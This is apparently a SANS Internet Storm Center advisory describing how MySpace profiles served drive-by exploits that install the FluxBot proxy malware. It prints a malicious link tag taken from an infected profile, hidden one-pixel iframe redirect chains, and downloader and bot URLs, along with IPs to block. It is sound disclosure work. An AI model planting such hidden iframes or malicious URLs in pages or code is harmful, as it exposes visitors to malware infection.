
SANS ISC: MySpace Flux Malware - SANS Internet Storm Center


MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.

FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 

 

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>



The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded JavaScript which decodes to:

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
The domain used here is of course again served via flux. header_03.gif in turn loads:

 

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>


Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these
URLs:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe


Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it is all said and done, you will be a proud new member of the flux net, and soon you
will find your system participating in phishing and similar endeavours.

A couple of IPs that may be worthwhile to block:

AS13767   | 72.232.254.218
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86
AS25761   | 72.20.6.10

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.

Johannes

ISC Handler
